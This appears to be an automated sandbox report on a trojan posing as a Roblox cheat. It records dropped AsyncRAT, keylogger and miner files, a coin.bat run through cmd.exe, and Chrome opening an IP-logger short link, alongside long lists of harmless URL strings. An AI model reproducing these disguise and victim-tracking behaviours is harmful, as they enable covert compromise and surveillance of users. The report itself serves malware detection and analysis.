            Source: sets.json.8.drString found in binary or memory: https://een.be
            Source: sets.json.8.drString found in binary or memory: https://efront.com
            Source: sets.json.8.drString found in binary or memory: https://eleconomista.net
            Source: sets.json.8.drString found in binary or memory: https://elfinancierocr.com
            Source: sets.json.8.drString found in binary or memory: https://elgrafico.com
            Source: sets.json.8.drString found in binary or memory: https://ella.sv
            Source: sets.json.8.drString found in binary or memory: https://elpais.com.uy
            Source: sets.json.8.drString found in binary or memory: https://elpais.uy
            Source: sets.json.8.drString found in binary or memory: https://etfacademy.it
            Source: sets.json.8.drString found in binary or memory: https://eworkbookcloud.com
            Source: sets.json.8.drString found in binary or memory: https://eworkbookrequest.com
            Source: sets.json.8.drString found in binary or memory: https://fakt.pl
            Source: sets.json.8.drString found in binary or memory: https://finn.no
            Source: sets.json.8.drString found in binary or memory: https://firstlook.biz
            Source: sets.json.8.drString found in binary or memory: https://gallito.com.uy
            Source: sets.json.8.drString found in binary or memory: https://geforcenow.com
            Source: sets.json.8.drString found in binary or memory: https://gettalkdesk.com
            Source: sets.json.8.drString found in binary or memory: https://gliadomain.com
            Source: sets.json.8.drString found in binary or memory: https://gnttv.com
            Source: sets.json.8.drString found in binary or memory: https://grid.id
            Source: sets.json.8.drString found in binary or memory: https://gridgames.app
            Source: sets.json.8.drString found in binary or memory: https://growthrx.in
            Source: sets.json.8.drString found in binary or memory: https://grupolpg.sv
            Source: sets.json.8.drString found in binary or memory: https://gujaratijagran.com
            Source: sets.json.8.drString found in binary or memory: https://hapara.com
            Source: sets.json.8.drString found in binary or memory: https://hazipatika.com
            Source: sets.json.8.drString found in binary or memory: https://hc1.com
            Source: sets.json.8.drString found in binary or memory: https://hc1.global
            Source: sets.json.8.drString found in binary or memory: https://hc1cas.com
            Source: sets.json.8.drString found in binary or memory: https://hc1cas.global
            Source: sets.json.8.drString found in binary or memory: https://healthshots.com
            Source: sets.json.8.drString found in binary or memory: https://hearty.app
            Source: sets.json.8.drString found in binary or memory: https://hearty.gift
            Source: sets.json.8.drString found in binary or memory: https://hearty.me
            Source: sets.json.8.drString found in binary or memory: https://heartymail.com
            Source: sets.json.8.drString found in binary or memory: https://helpdesk.com
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2129059301.0000000002899000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127732650.0000000002093000.00000002.00000001.01000000.00000009.sdmp, cacert.pem.4.drString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/cert
            Source: sets.json.8.drString found in binary or memory: https://hindustantimes.com
            Source: sets.json.8.drString found in binary or memory: https://hj.rs
            Source: sets.json.8.drString found in binary or memory: https://hjck.com
            Source: sets.json.8.drString found in binary or memory: https://html-load.cc
            Source: sets.json.8.drString found in binary or memory: https://html-load.com
            Source: sets.json.8.drString found in binary or memory: https://human-talk.org
            Source: sets.json.8.drString found in binary or memory: https://idbs-cloud.com
            Source: sets.json.8.drString found in binary or memory: https://idbs-dev.com
            Source: sets.json.8.drString found in binary or memory: https://idbs-eworkbook.com
            Source: sets.json.8.drString found in binary or memory: https://idbs-staging.com
            Source: sets.json.8.drString found in binary or memory: https://img-load.com
            Source: sets.json.8.drString found in binary or memory: https://indiatimes.com
            Source: sets.json.8.drString found in binary or memory: https://indiatoday.in
            Source: sets.json.8.drString found in binary or memory: https://indiatodayne.in
            Source: sets.json.8.drString found in binary or memory: https://infoedgeindia.com
            Source: sets.json.8.drString found in binary or memory: https://interia.pl
            Source: sets.json.8.drString found in binary or memory: https://intoday.in
            Source: sets.json.8.drString found in binary or memory: https://iolam.it
            Source: chromecache_145.11.drString found in binary or memory: https://iplogger.org/
            Source: chromecache_145.11.drString found in binary or memory: https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f83229
            Source: chromecache_145.11.drString found in binary or memory: https://iplogger.org/privacy/
            Source: chromecache_145.11.drString found in binary or memory: https://iplogger.org/rules/
            Source: sets.json.8.drString found in binary or memory: https://ishares.com
            Source: sets.json.8.drString found in binary or memory: https://jagran.com
            Source: sets.json.8.drString found in binary or memory: https://johndeere.com
            Source: sets.json.8.drString found in binary or memory: https://journaldesfemmes.com
            Source: sets.json.8.drString found in binary or memory: https://journaldesfemmes.fr
            Source: sets.json.8.drString found in binary or memory: https://journaldunet.com
            Source: sets.json.8.drString found in binary or memory: https://journaldunet.fr
            Source: sets.json.8.drString found in binary or memory: https://joyreactor.cc
            Source: sets.json.8.drString found in binary or memory: https://joyreactor.com
            Source: sets.json.8.drString found in binary or memory: https://kaksya.in
            Source: sets.json.8.drString found in binary or memory: https://knowledgebase.com
            Source: sets.json.8.drString found in binary or memory: https://kompas.com
            Source: sets.json.8.drString found in binary or memory: https://kompas.tv
            Source: sets.json.8.drString found in binary or memory: https://kompasiana.com
            Source: sets.json.8.drString found in binary or memory: https://lanacion.com.ar
            Source: sets.json.8.drString found in binary or memory: https://landyrev.com
            Source: sets.json.8.drString found in binary or memory: https://landyrev.ru
            Source: sets.json.8.drString found in binary or memory: https://laprensagrafica.com
            Source: sets.json.8.drString found in binary or memory: https://lateja.cr
            Source: sets.json.8.drString found in binary or memory: https://libero.it
            Source: sets.json.8.drString found in binary or memory: https://linternaute.com
            Source: sets.json.8.drString found in binary or memory: https://linternaute.fr
            Source: sets.json.8.drString found in binary or memory: https://livechat.com
            Source: sets.json.8.drString found in binary or memory: https://livechatinc.com
            Source: sets.json.8.drString found in binary or memory: https://livehindustan.com
            Source: sets.json.8.drString found in binary or memory: https://livemint.com
            Source: sets.json.8.drString found in binary or memory: https://max.auto
            Source: sets.json.8.drString found in binary or memory: https://medonet.pl
            Source: sets.json.8.drString found in binary or memory: https://meo.pt
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.cl
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.co.cr
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.ar
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.bo
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.co
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.do
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.ec
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.gt
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.hn
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.mx
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.ni
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.pa
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.pe
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.py
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.sv
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.uy
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.ve
            Source: sets.json.8.drString found in binary or memory: https://mercadolivre.com
            Source: sets.json.8.drString found in binary or memory: https://mercadolivre.com.br
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.cl
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.ar
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.br
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.co
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.ec
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.mx
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.pe
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.uy
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.ve
            Source: sets.json.8.drString found in binary or memory: https://mercadoshops.cl
            Source: sets.json.8.drString found in binary or memory: https://mercadoshops.com
            Source: sets.json.8.drString found in binary or memory: https://mercadoshops.com.ar
            Source: sets.json.8.drString found in binary or memory: https://mercadoshops.com.br
            Source: sets.json.8.drString found in binary or memory: https://mercadoshops.com.co
            Source: sets.json.8.drString found in binary or memory: https://mercadoshops.com.mx
            Source: sets.json.8.drString found in binary or memory: https://mighty-app.appspot.com
            Source: sets.json.8.drString found in binary or memory: https://mightytext.net
            Source: sets.json.8.drString found in binary or memory: https://mittanbud.no
            Source: sets.json.8.drString found in binary or memory: https://money.pl
            Source: sets.json.8.drString found in binary or memory: https://mystudentdashboard.com
            Source: sets.json.8.drString found in binary or memory: https://nacion.com
            Source: sets.json.8.drString found in binary or memory: https://naukri.com
            Source: sets.json.8.drString found in binary or memory: https://nidhiacademyonline.com
            Source: sets.json.8.drString found in binary or memory: https://nien.co
            Source: sets.json.8.drString found in binary or memory: https://nien.com
            Source: sets.json.8.drString found in binary or memory: https://nien.org
            Source: sets.json.8.drString found in binary or memory: https://nlc.hu
            Source: sets.json.8.drString found in binary or memory: https://nosalty.hu
            Source: sets.json.8.drString found in binary or memory: https://noticiascaracol.com
            Source: sets.json.8.drString found in binary or memory: https://nourishingpursuits.com
            Source: sets.json.8.drString found in binary or memory: https://nvidia.com
            Source: sets.json.8.drString found in binary or memory: https://o2.pl
            Source: sets.json.8.drString found in binary or memory: https://ocdn.eu
            Source: sets.json.8.drString found in binary or memory: https://onet.pl
            Source: sets.json.8.drString found in binary or memory: https://ottplay.com
            Source: sets.json.8.drString found in binary or memory: https://p106.net
            Source: sets.json.8.drString found in binary or memory: https://p24.hu
            Source: sets.json.8.drString found in binary or memory: https://paula.com.uy
            Source: sets.json.8.drString found in binary or memory: https://pdmp-apis.no
            Source: sets.json.8.drString found in binary or memory: https://phonandroid.com
            Source: sets.json.8.drString found in binary or memory: https://player.pl
            Source: sets.json.8.drString found in binary or memory: https://plejada.pl
            Source: sets.json.8.drString found in binary or memory: https://poalim.site
            Source: sets.json.8.drString found in binary or memory: https://poalim.xyz
            Source: sets.json.8.drString found in binary or memory: https://pomponik.pl
            Source: sets.json.8.drString found in binary or memory: https://portalinmobiliario.com
            Source: sets.json.8.drString found in binary or memory: https://prisjakt.no
            Source: sets.json.8.drString found in binary or memory: https://pudelek.pl
            Source: sets.json.8.drString found in binary or memory: https://punjabijagran.com
            Source: sets.json.8.drString found in binary or memory: https://radio1.be
            Source: sets.json.8.drString found in binary or memory: https://radio2.be
            Source: sets.json.8.drString found in binary or memory: https://reactor.cc
            Source: sets.json.8.drString found in binary or memory: https://repid.org
            Source: sets.json.8.drString found in binary or memory: https://reshim.org
            Source: sets.json.8.drString found in binary or memory: https://rws1nvtvt.com
            Source: sets.json.8.drString found in binary or memory: https://rws2nvtvt.com
            Source: sets.json.8.drString found in binary or memory: https://rws3nvtvt.com
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://s3.amazonaws.com/
            Source: sets.json.8.drString found in binary or memory: https://sackrace.ai
            Source: sets.json.8.drString found in binary or memory: https://salemoveadvisor.com
            Source: sets.json.8.drString found in binary or memory: https://salemovefinancial.com
            Source: sets.json.8.drString found in binary or memory: https://salemovetravel.com
            Source: sets.json.8.drString found in binary or memory: https://samayam.com
            Source: sets.json.8.drString found in binary or memory: https://sapo.io
            Source: sets.json.8.drString found in binary or memory: https://sapo.pt
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3809388859.000000000285C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.comwI&
            Source: sets.json.8.drString found in binary or memory: https://shock.co
            Source: sets.json.8.drString found in binary or memory: https://smaker.pl
            Source: sets.json.8.drString found in binary or memory: https://smoney.vn
            Source: sets.json.8.drString found in binary or memory: https://smpn106jkt.sch.id
            Source: sets.json.8.drString found in binary or memory: https://socket-to-me.vip
            Source: sets.json.8.drString found in binary or memory: https://songshare.com
            Source: sets.json.8.drString found in binary or memory: https://songstats.com
            Source: sets.json.8.drString found in binary or memory: https://sporza.be
            Source: sets.json.8.drString found in binary or memory: https://standardsandpraiserepurpose.com
            Source: sets.json.8.drString found in binary or memory: https://startlap.hu
            Source: sets.json.8.drString found in binary or memory: https://startupislandtaiwan.com
            Source: sets.json.8.drString found in binary or memory: https://startupislandtaiwan.net
            Source: sets.json.8.drString found in binary or memory: https://startupislandtaiwan.org
            Source: sets.json.8.drString found in binary or memory: https://stripe.com
            Source: sets.json.8.drString found in binary or memory: https://stripe.network
            Source: sets.json.8.drString found in binary or memory: https://stripecdn.com
            Source: sets.json.8.drString found in binary or memory: https://supereva.it
            Source: sets.json.8.drString found in binary or memory: https://talkdeskqaid.com
            Source: sets.json.8.drString found in binary or memory: https://talkdeskstgid.com
            Source: sets.json.8.drString found in binary or memory: https://teacherdashboard.com
            Source: sets.json.8.drString found in binary or memory: https://technology-revealed.com
            Source: sets.json.8.drString found in binary or memory: https://terazgotuje.pl
            Source: sets.json.8.drString found in binary or memory: https://text.com
            Source: sets.json.8.drString found in binary or memory: https://textyserver.appspot.com
            Source: sets.json.8.drString found in binary or memory: https://the42.ie
            Source: sets.json.8.drString found in binary or memory: https://thejournal.ie
            Source: sets.json.8.drString found in binary or memory: https://thirdspace.org.au
            Source: sets.json.8.drString found in binary or memory: https://timesinternet.in
            Source: sets.json.8.drString found in binary or memory: https://timesofindia.com
            Source: sets.json.8.drString found in binary or memory: https://tolteck.app
            Source: sets.json.8.drString found in binary or memory: https://tolteck.com
            Source: sets.json.8.drString found in binary or memory: https://top.pl
            Source: sets.json.8.drString found in binary or memory: https://tribunnews.com
            Source: sets.json.8.drString found in binary or memory: https://trytalkdesk.com
            Source: sets.json.8.drString found in binary or memory: https://tucarro.com
            Source: sets.json.8.drString found in binary or memory: https://tucarro.com.co
            Source: sets.json.8.drString found in binary or memory: https://tucarro.com.ve
            Source: sets.json.8.drString found in binary or memory: https://tvid.in
            Source: sets.json.8.drString found in binary or memory: https://tvn.pl
            Source: sets.json.8.drString found in binary or memory: https://tvn24.pl
            Source: sets.json.8.drString found in binary or memory: https://unotv.com
            Source: sets.json.8.drString found in binary or memory: https://victorymedium.com
            Source: sets.json.8.drString found in binary or memory: https://vrt.be
            Source: sets.json.8.drString found in binary or memory: https://vwo.com
            Source: sets.json.8.drString found in binary or memory: https://welt.de
            Source: sets.json.8.drString found in binary or memory: https://wieistmeineip.de
            Source: sets.json.8.drString found in binary or memory: https://wildix.com
            Source: sets.json.8.drString found in binary or memory: https://wildixin.com
            Source: sets.json.8.drString found in binary or memory: https://wingify.com
            Source: sets.json.8.drString found in binary or memory: https://wordle.at
            Source: sets.json.8.drString found in binary or memory: https://wp.pl
            Source: sets.json.8.drString found in binary or memory: https://wpext.pl
            Source: sets.json.8.drString found in binary or memory: https://www.asadcdn.com
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3810149194.0000000004B73000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806474802.0000000004B6C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805832036.0000000004B57000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806735943.0000000004B6F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817719825.0000000004B73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3805926753.0000000004B85000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805686454.0000000004B82000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817824110.0000000004B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: sets.json.8.drString found in binary or memory: https://ya.ru
            Source: sets.json.8.drString found in binary or memory: https://zalo.me
            Source: sets.json.8.drString found in binary or memory: https://zdrowietvn.pl
            Source: sets.json.8.drString found in binary or memory: https://zingmp3.vn
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.6:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.6:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58797 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: BitCoin_miner.exe.0.dr, XLogger.cs, .Net Code: KeyboardLayout
            Source: msedge.exe.0.dr, XLogger.cs, .Net Code: KeyboardLayout

            System Summary

            Source: 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED, Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED, Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED, Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: C:\Users\user\Desktop\cheat_roblox.exe, Code function: 0_2_00007FF693E5C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\sets.json
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\manifest.json
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\LICENSE
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\_metadata\
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\_metadata\verified_contents.json
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\manifest.fingerprint
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\Google.Widevine.CDM.dll
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\manifest.json
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\_metadata\
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\_metadata\verified_contents.json
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\manifest.fingerprint
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\cr_en-us_500000_index.bin
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\manifest.json
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\_metadata\
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\_metadata\verified_contents.json
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\manifest.fingerprint
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File deleted: C:\Windows\SystemTemp\chrome_BITS_6712_1318469463
            Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\ msedge.exe E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
            Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe 79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
            Source: Google.Widevine.CDM.dll.8.dr, Static PE information: Number of sections : 12 > 10
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameRoblox.exeH vs cheat_roblox.exe
            Source: cheat_roblox.exe, 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameXClient.exe4 vs cheat_roblox.exe
            Source: cheat_roblox.exe, 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameX.exe4 vs cheat_roblox.exe
            Source: 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: BitCoin_miner.exe.0.dr, Helper.cs, Cryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.0.dr, AlgorithmAES.cs, Cryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.0.dr, tMXwX3tWlMuOZgJ.cs, Cryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.0.dr, dtVFTVK0Ux3SN1R.cs, Cryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, Helper.cs, Cryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, AlgorithmAES.cs, Cryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, ClientSocket.cs, Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.0.dr, ClientSocket.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.cs, Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.0.dr, ClientSocket.cs, Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.0.dr, ClientSocket.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine, Classification label: mal52.troj.spyw.evad.winEXE@33/28@20/13
            Source: C:\Users\user\Desktop\cheat_roblox.exe, Code function: 0_2_00007FF693E5B6D8 GetLastError,FormatMessageW,LocalFree
            Source: C:\Users\user\Desktop\cheat_roblox.exe, Code function: 0_2_00007FF693E78624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe, File created: C:\Program Files (x86)\Roblox
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe, File created: C:\Users\user\AppData\Local\Roblox
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4000:120:WilError_03
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
            Source: C:\Users\user\Desktop\cheat_roblox.exe, File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5872578
            Source: C:\Users\user\Desktop\cheat_roblox.exe, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
            Source: cheat_roblox.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\cheat_roblox.exe, File read: C:\Windows\win.ini
            Source: C:\Users\user\Desktop\cheat_roblox.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: cheat_roblox.exe, ReversingLabs: Detection: 59%
            Source: C:\Users\user\Desktop\cheat_roblox.exe, File read: C:\Users\user\Desktop\cheat_roblox.exe
            Source: unknown, Process created: C:\Users\user\Desktop\cheat_roblox.exe "C:\Users\user\Desktop\cheat_roblox.exe"
            Source: C:\Users\user\Desktop\cheat_roblox.exe, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\cheat_roblox.exe, Process created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe"
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\cmd.exe cmd
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 --field-trial-handle=1980,i,3286908272416009532,3896627819344561856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: unknown unknown
